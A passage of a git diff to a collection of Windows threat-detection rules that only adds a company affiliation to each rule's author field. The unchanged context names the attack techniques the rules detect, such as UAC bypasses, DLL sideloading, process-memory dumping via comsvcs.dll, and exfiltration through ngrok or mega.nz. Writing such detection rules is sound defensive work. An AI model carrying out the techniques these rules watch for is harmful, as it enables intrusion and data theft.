b/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml index 00ebb166c..2253e434e 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml index b5dd31f77..9512cc438 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw - https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute -author: Antonio Cocomazzi (idea), Florian Roth (rule) +author: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems) date: 2022/04/27 modified: 2022/11/22 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml index ef4e93f2b..d313eb87c 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique references: - https://github.com/Wh04m1001/IDiagnosticProfileUAC -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/03 tags: - attack.execution diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml index 5fb87a9b7..261a391c0 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml index 4d747179a..7c002dee7 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml index d40c2e90d..842b6ed0e 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml index 49fbb8b79..eb3cc9a6e 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml b/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml index ef2c27bd2..cb58da9fa 100644 --- a/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml +++ b/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml @@ -4,7 +4,7 @@ status: test description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/23 modified: 2022/10/09 tags: diff --git a/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml b/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml index 314b3d8bb..5212ce362 100644 --- a/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml +++ b/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml @@ -5,7 +5,7 @@ description: Detects file creation patterns noticeable during the exploitation o references: - https://twitter.com/RonnyTNL/status/1436334640617373699?s=20 - https://twitter.com/vanitasnk/status/1437329511142420483?s=21 -author: Florian Roth, Sittikorn S +author: Florian Roth (Nextron Systems), Sittikorn S date: 2021/09/10 modified: 2022/06/17 tags: diff --git a/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml b/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml index 1fdcb431b..db8136cdc 100644 --- a/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml +++ b/rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of the default output filename used by the wmicexec tool references: - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/02 tags: - attack.lateral_movement diff --git a/rules/windows/file/file_event/file_event_win_word_template_creation.yml b/rules/windows/file/file_event/file_event_win_word_template_creation.yml index 10fa79b03..4c1412815 100644 --- a/rules/windows/file/file_event/file_event_win_word_template_creation.yml +++ b/rules/windows/file/file_event/file_event_win_word_template_creation.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of template files for Microsoft Office from outside Office references: - https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/06/02 tags: - attack.persistence diff --git a/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml b/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml index 1ae74c2cf..c1675fd64 100644 --- a/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml +++ b/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml @@ -5,7 +5,7 @@ description: Detects creation of a file named "wpbbin" in the "%systemroot%\syst references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/18 tags: - attack.persistence diff --git a/rules/windows/image_load/image_load_foggyweb_nobelium.yml b/rules/windows/image_load/image_load_foggyweb_nobelium.yml index 8c0ca56f2..157e8a1a7 100644 --- a/rules/windows/image_load/image_load_foggyweb_nobelium.yml +++ b/rules/windows/image_load/image_load_foggyweb_nobelium.yml @@ -4,7 +4,7 @@ status: test description: Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/09/27 modified: 2022/12/09 tags: diff --git a/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml b/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml index 80f0880dd..f8fa5c83c 100644 --- a/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml +++ b/rules/windows/image_load/image_load_rundll32_loading_renamed_comsvcs.yml @@ -4,7 +4,7 @@ status: experimental description: Detects rundll32 loading a renamed comsvcs.dll to dump process memory references: - https://twitter.com/sbousseaden/status/1555200155351228419 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/14 tags: - attack.credential_access diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index 03c260f8d..afc17376b 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 modified: 2023/01/29 tags: diff --git a/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml b/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml index 5ba1d665f..d3936c225 100644 --- a/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml +++ b/rules/windows/image_load/image_load_side_load_aruba_networks_virtual_intranet_access.yml @@ -4,7 +4,7 @@ status: experimental description: Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking references: - https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/22 tags: - attack.privilege_escalation diff --git a/rules/windows/image_load/image_load_side_load_comctl32.yml b/rules/windows/image_load/image_load_side_load_comctl32.yml index 39a6d77ca..e4caf99c1 100644 --- a/rules/windows/image_load/image_load_side_load_comctl32.yml +++ b/rules/windows/image_load/image_load_side_load_comctl32.yml @@ -5,7 +5,7 @@ description: Detects potential DLL sideloading using comctl32.dll to obtain syst references: - https://github.com/binderlabs/DirCreate2System - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt -author: Nasreddine Bencherchali, Subhash Popuri (@pbssubhash) +author: Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash) date: 2022/12/16 modified: 2022/12/19 tags: diff --git a/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml b/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml index e4cd4886c..2a7e92623 100644 --- a/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml +++ b/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of "dbgcore.dll" references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2022/10/28 tags: diff --git a/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml b/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml index 01b803da9..e88284af9 100644 --- a/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml +++ b/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of "dbghelp.dll" references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/10/25 modified: 2022/10/28 tags: diff --git a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml index 0a78caef7..4200548e7 100644 --- a/rules/windows/image_load/image_load_side_load_from_non_system_location.yml +++ b/rules/windows/image_load/image_load_side_load_from_non_system_location.yml @@ -7,7 +7,7 @@ references: - https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/ # WindowsCodecs.dll - https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ # iphlpapi.dll - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md -author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project) date: 2022/08/14 modified: 2023/01/09 tags: diff --git a/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml b/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml index 540bbb446..2a1efbf07 100644 --- a/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml +++ b/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml @@ -12,7 +12,7 @@ references: - https://github.com/Wh04m1001/SysmonEoP - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/ - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/09 modified: 2023/01/30 tags: diff --git a/rules/windows/image_load/image_load_side_load_office_dlls.yml b/rules/windows/image_load/image_load_side_load_office_dlls.yml index 19084453d..0b5daf8cc 100644 --- a/rules/windows/image_load/image_load_side_load_office_dlls.yml +++ b/rules/windows/image_load/image_load_side_load_office_dlls.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_side_load_scm.yml b/rules/windows/image_load/image_load_side_load_scm.yml index fd244a0c5..1f311e422 100644 --- a/rules/windows/image_load/image_load_side_load_scm.yml +++ b/rules/windows/image_load/image_load_side_load_scm.yml @@ -5,7 +5,7 @@ description: Detects DLL sideloading of DLLs that are loaded by the SCM for some references: - https://decoded.avast.io/martinchlumecky/png-steganography/ - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/01 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_side_load_third_party.yml b/rules/windows/image_load/image_load_side_load_third_party.yml index 10e7e0aea..443ad1024 100644 --- a/rules/windows/image_load/image_load_side_load_third_party.yml +++ b/rules/windows/image_load/image_load_side_load_third_party.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_side_load_vmguestlib.yml b/rules/windows/image_load/image_load_side_load_vmguestlib.yml index 952edea99..8f388df66 100644 --- a/rules/windows/image_load/image_load_side_load_vmguestlib.yml +++ b/rules/windows/image_load/image_load_side_load_vmguestlib.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service. references: - https://decoded.avast.io/martinchlumecky/png-steganography/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/01 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_side_load_web_browsers.yml b/rules/windows/image_load/image_load_side_load_web_browsers.yml index 3ab680e9c..f28b8d52a 100644 --- a/rules/windows/image_load/image_load_side_load_web_browsers.yml +++ b/rules/windows/image_load/image_load_side_load_web_browsers.yml @@ -4,7 +4,7 @@ status: experimental description: Detects DLL sideloading of DLLs that are part of web browsers references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) -author: Nasreddine Bencherchali, Wietze Beukema (project and research) +author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research) date: 2022/08/17 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_susp_cmstp.yml b/rules/windows/image_load/image_load_susp_cmstp.yml index b7784af32..27fda43c1 100644 --- a/rules/windows/image_load/image_load_susp_cmstp.yml +++ b/rules/windows/image_load/image_load_susp_cmstp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects cmstp loading "dll" or "ocx" files from suspicious locations references: - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/30 tags: - attack.defense_evasion diff --git a/rules/windows/image_load/image_load_susp_dll_load_system_process.yml b/rules/windows/image_load/image_load_susp_dll_load_system_process.yml index fc2acbb2e..01aa2aa55 100644 --- a/rules/windows/image_load/image_load_susp_dll_load_system_process.yml +++ b/rules/windows/image_load/image_load_susp_dll_load_system_process.yml @@ -4,7 +4,7 @@ status: experimental description: Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp% references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea) -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/17 modified: 2022/12/02 tags: diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml index ee6c3c45f..8bd273d4b 100644 --- a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml +++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs references: - https://github.com/bats3c/EvtMute -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/07 modified: 2022/11/29 tags: diff --git a/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml b/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml index 067d4917e..b4f40bba4 100644 --- a/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml +++ b/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml @@ -5,7 +5,7 @@ description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DL references: - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC - https://twitter.com/wdormann/status/1547583317410607110 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/17 modified: 2022/07/25 tags: diff --git a/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml b/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml index 82e939764..96b4a5934 100644 --- a/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml +++ b/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml @@ -4,7 +4,7 @@ status: test description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances references: - https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/09/07 modified: 2022/10/09 tags: diff --git a/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml index ce9aae974..5dba6005a 100644 --- a/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml +++ b/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml @@ -4,7 +4,7 @@ status: experimental description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL references: - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/02 tags: - attack.defense_evasion diff --git a/rules/windows/network_connection/net_connection_win_binary_github_com.yml b/rules/windows/network_connection/net_connection_win_binary_github_com.yml index 4014699fc..a5da3843e 100755 --- a/rules/windows/network_connection/net_connection_win_binary_github_com.yml +++ b/rules/windows/network_connection/net_connection_win_binary_github_com.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/M_haggis/status/900741347035889665 - https://twitter.com/M_haggis/status/1032799638213066752 - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 -author: Michael Haag (idea), Florian Roth (rule) +author: Michael Haag (idea), Florian Roth (Nextron Systems) date: 2017/08/24 modified: 2021/11/27 tags: diff --git a/rules/windows/network_connection/net_connection_win_binary_susp_com.yml b/rules/windows/network_connection/net_connection_win_binary_susp_com.yml index 54e117dcd..7d2049433 100755 --- a/rules/windows/network_connection/net_connection_win_binary_susp_com.yml +++ b/rules/windows/network_connection/net_connection_win_binary_susp_com.yml @@ -7,7 +7,7 @@ references: - https://twitter.com/M_haggis/status/1032799638213066752 - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/08/30 modified: 2023/01/19 tags: diff --git a/rules/windows/network_connection/net_connection_win_crypto_mining.yml b/rules/windows/network_connection/net_connection_win_crypto_mining.yml index e45637de6..3b6617e47 100644 --- a/rules/windows/network_connection/net_connection_win_crypto_mining.yml +++ b/rules/windows/network_connection/net_connection_win_crypto_mining.yml @@ -4,7 +4,7 @@ status: stable description: Detects process connections to a Monero crypto mining pool references: - https://www.poolwatch.io/coin/monero -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/26 tags: - attack.impact diff --git a/rules/windows/network_connection/net_connection_win_eqnedt.yml b/rules/windows/network_connection/net_connection_win_eqnedt.yml index 12ae5491e..dff60b653 100755 --- a/rules/windows/network_connection/net_connection_win_eqnedt.yml +++ b/rules/windows/network_connection/net_connection_win_eqnedt.yml @@ -5,7 +5,7 @@ description: Detects network connections from Equation Editor references: - https://twitter.com/forensicitguy/status/1513538712986079238 - https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/ -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2022/04/14 tags: - attack.execution diff --git a/rules/windows/network_connection/net_connection_win_hh.yml b/rules/windows/network_connection/net_connection_win_hh.yml index 8c2734bcc..7d3483788 100644 --- a/rules/windows/network_connection/net_connection_win_hh.yml +++ b/rules/windows/network_connection/net_connection_win_hh.yml @@ -8,7 +8,7 @@ description: Detects network connections made by the "hh.exe" process, which cou references: - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/10/05 tags: - attack.defense_evasion diff --git a/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml b/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml index a0af40626..5f5c2dd32 100755 --- a/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml +++ b/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml @@ -4,7 +4,7 @@ status: test description: Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases references: - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/19 modified: 2022/10/05 tags: diff --git a/rules/windows/network_connection/net_connection_win_mega_nz.yml b/rules/windows/network_connection/net_connection_win_mega_nz.yml index 1dff349b5..83c9e88e0 100644 --- a/rules/windows/network_connection/net_connection_win_mega_nz.yml +++ b/rules/windows/network_connection/net_connection_win_mega_nz.yml @@ -5,7 +5,7 @@ description: Detects an executable accessing mega.co.nz, which could be a sign o references: - https://megatools.megous.com/ - https://www.mandiant.com/resources/russian-targeting-gov-business -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/12/06 modified: 2022/12/25 tags: diff --git a/rules/windows/network_connection/net_connection_win_ngrok_io.yml b/rules/windows/network_connection/net_connection_win_ngrok_io.yml index 3db0d9864..ae0bca43b 100644 --- a/rules/windows/network_connection/net_connection_win_ngrok_io.yml +++ b/rules/windows/network_connection/net_connection_win_ngrok_io.yml @@ -5,7 +5,7 @@ description: Detects an executable accessing ngrok.io, which could be a sign of references: - https://ngrok.com/ - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/16 tags: - attack.exfiltration diff --git a/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml b/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml index 9f54a1bb0..509e28bf9 100644 --- a/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml +++ b/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml @@ -5,7 +5,7 @@ description: Detects an executable accessing an ngrok tunneling endpoint, which references: - https://twitter.com/hakluke/status/1587733971814977537/photo/1 - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/03 tags: - attack.exfiltration diff --git a/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml b/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml index e0bb02c95..91740354b 100755 --- a/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml +++ b/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range') references: - https://www.youtube.com/watch?v=DLtJTxMWZ2o -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/13 modified: 2023/01/20 tags: diff --git a/rules/windows/network_connection/net_connection_win_rdp_to_http.yml b/rules/windows/network_connection/net_connection_win_rdp_to_http.yml index 47953ef9b..00e0a1c79 100644 --- a/rules/windows/network_connection/net_connection_win_rdp_to_http.yml +++ b/rules/windows/network_connection/net_connection_win_rdp_to_http.yml @@ -5,7 +5,7 @@ description: Detects svchost hosting RDP termsvcs communicating to target system references: - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/04/29 modified: 2022/07/14 tags: diff --git a/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml b/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml index ff1d3c1fd..246b2969f 100755 --- a/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml +++ b/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml @@ -4,7 +4,7 @@ status: test description: Detects a rundll32 that communicates with public IP addresses references: - https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/11/04 modified: 2022/12/30 tags: diff --git a/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml b/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml index 6845fe88a..78029c3cd 100644 --- a/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml +++ b/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters references: - https://redcanary.com/blog/raspberry-robin/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/03 tags: - attack.defense_evasion diff --git a/rules/windows/network_connection/net_connection_win_susp_cmstp.yml b/rules/windows/network_connection/net_connection_win_susp_cmstp.yml index 48daf9a9c..2272d71ca 100644 --- a/rules/windows/network_connection/net_connection_win_susp_cmstp.yml +++ b/rules/windows/network_connection/net_connection_win_susp_cmstp.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious network connection by Cmstp references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/30 tags: - 